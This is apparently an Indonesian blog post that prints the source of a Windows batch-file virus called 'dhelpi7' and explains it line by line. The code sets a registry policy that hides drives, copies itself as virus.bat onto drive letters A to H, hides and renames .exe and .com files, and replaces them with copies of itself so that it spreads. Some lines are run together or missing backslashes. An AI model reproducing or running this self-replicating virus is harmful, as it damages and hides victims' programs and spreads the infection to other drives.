@Echo off
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoViewOnDrive /t REG_DWORD /d 16 /f @Echo off
rem ---------------------------------
for %%a in (A B C D E F G H) do if exist "%%a:" copy "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\29.tmp\wshell.dll" "%%a:\virus.bat" ctty nul
rem : dhelpi7 Virus
rem : This virus "attrib -h -r *.*" in
rem :--------------------------------------------------------------
for %%f in (*.exe *.com) do set A=%%f if %A%==COMMAND.COM set A= rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A% copy %0.bat %A% attrib +r %A% ren %A% *.bat
set A=
:end
ctty con @if exist V%0.com V%0.com %echo %2 %3 @if exist V%0.exe V%0.exe %echo %2 %3
rem ---------------------------------
ane lupa jelasin semua code2 nya sekalian dah ane jelasi code2 nya biar pada jelas
(Continue)..
Code:
@Echo off <<<<<< membuat layar hitam atau blank/tidak ada tulisan sama sekali
Code:
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v
<<< code ini registri yng di infeksi oleh virusnya
Code:
NoViewOnDrive /t REG_DWORD /d 16 /f << mengunci registri di komputer
Code:
rem ---------------------------------
for %%a in (A B C D E F G H) do if exist "%%a:" copy "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\29.tmp\wshell.dll" "%%a:\virus.bat"
ctty nul
rem : dhelpi7 Virus
rem : This virus "attrib -h -r *.*" in
rem :--------------------------------------------------------------
<<<<< semua code ini perintah-perintah virusnya dan berada dimana letaknya
Code:
copy %0.bat %A% <<<<< ini code buat menggandakan diri
********************************patch*****************************************
0 komentar:
Posting Komentar